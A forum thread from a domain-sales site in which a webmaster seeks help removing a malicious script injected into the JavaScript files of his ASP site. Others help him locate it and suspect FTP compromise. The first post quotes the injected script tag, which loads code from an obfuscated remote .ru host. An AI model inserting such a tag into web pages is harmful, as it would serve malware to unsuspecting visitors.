![]() |
|
| Domain Name Sales | Domain Software | Calculate UK Domain Drop Dates | Domain Registration | NameDrive | Domain Parking | Subscribe to our Domains For Sale newsletter |
| | ||||||
| Home | Register | Rules | Membership Upgrade | Domains For Sale | Domain Name Escrow | Mark Forums Read | Domain Classified | Chat Room |
| Scripts and Coding PHP, MySQL, scripts |
![]() |
| | LinkBack | Thread Tools | Display Modes |
| | #1 (permalink) |
![]() | Malware
Somewhere in my code is a malware script it basically this remote data services data control bloodhound virus embedded in webpage : services, remote, control i've searched high and low for the script within the code without any luck. Using firefox with combined generated source you can see it - index page shows the code at the bottom <script src="h**p://surfthechannel-com.tribalfusion.com.rakuten-co-jp.worldwebworld.ru:8080/google.com/google.com/yieldmanager.com/girlsgogames.com/it168.com/" id="Y1oh3ud7md" type="text/javascript" defer="defer"></script> but looking at the 2 frames individually it isnt there i've run malware and anti virus all over it with out joy. Also full script searches for any of the text within that link - even gone through all the javascript references any ideas??
__________________ domains for sale: Cowrie.co.uk SEDO sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts |
| |
| | #2 (permalink) |
![]() |
Not just from that I'm afraid, the ones I've seen have usually been included by using PHPs base64_decode function, making it harder to spot/find.
__________________ Me: Blog | Company | Twitter Coming Soon: DaveDomains | DaveCatcher | FreeToReg.co.uk |
| |
| | #3 (permalink) |
![]() |
asp site so not sure it will be in the PHP? have being using firebug to step through every parameter but not sure what exactly i'm looking for well if you can spot it URL is ******marineband.com any help appreciated
__________________ domains for sale: Cowrie.co.uk SEDO sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts |
| |
| | #4 (permalink) |
![]() |
Check the last line of all your javascript files. e.g. httpRequest.js, line 99
__________________ Me: Blog | Company | Twitter Coming Soon: DaveDomains | DaveCatcher | FreeToReg.co.uk |
| |
| | #5 (permalink) |
![]() |
brilliance! thanks you saved me - i owe you a beer dont suppose you can tell me how you found that? save me the turmoil next time.
__________________ domains for sale: Cowrie.co.uk SEDO sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts |
| |
| | #6 (permalink) |
![]() |
in fact the script was in everyone of my js include files - thanks again for putting me on the right track
__________________ domains for sale: Cowrie.co.uk SEDO sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts |
| |
| | #7 (permalink) |
![]() |
I just checked your JS for anything suspicious looking!
|
| |
| | #8 (permalink) |
![]() |
bit odd that antivirus and malware missed these I know that they cant cover every script but the format must be similar. I've had this before. Oddly they are very recent additions - i archived the site last week and they are not in there then. Suppose hackers work every day
__________________ domains for sale: Cowrie.co.uk SEDO sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts |
| |
| | #9 (permalink) | |
![]() | Quote:
| |
| |
| | #10 (permalink) |
![]() |
difficult to spot unless i know exactly how they got in ftp access to files - means i can only change the password on the ftp, which will only delay them if they are that keen. Not sure what it was set to but i can only imagine thats the way they did it?
__________________ domains for sale: Cowrie.co.uk SEDO sites:iroses ichocolate sportsunderwear personallingerie Italy Hotels magazinediscounts |
| |
![]() |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
| |
Similar Threads | ||||
| Thread | Thread Starter | Domain Name Community | Replies | Last Post |
| Help - nasty malware problem | crabfoot | New Domainers | 9 | 30-11-2009 08:26:44 PM |
| Targeted Malware Attack on Foreign Correspondents based in China - Information Warfar | RSS | Domain Name News | 0 | 28-09-2009 07:01:29 AM |
| Cleansing the Augean (ICANN) Stables of Malware distributors - ComputerWeekly.com | RSS | Domain Name News | 0 | 17-03-2009 06:59:05 PM |
| EstDomains, Inc: Global Struggle Against Malware Distribution - Domain informer | RSS | Domain Name News | 0 | 15-09-2008 01:59:06 PM |
| EstDomains, Inc: Global Struggle Against Malware Distribution - PR Web (press release | RSS | Domain Name News | 0 | 14-09-2008 07:59:26 AM |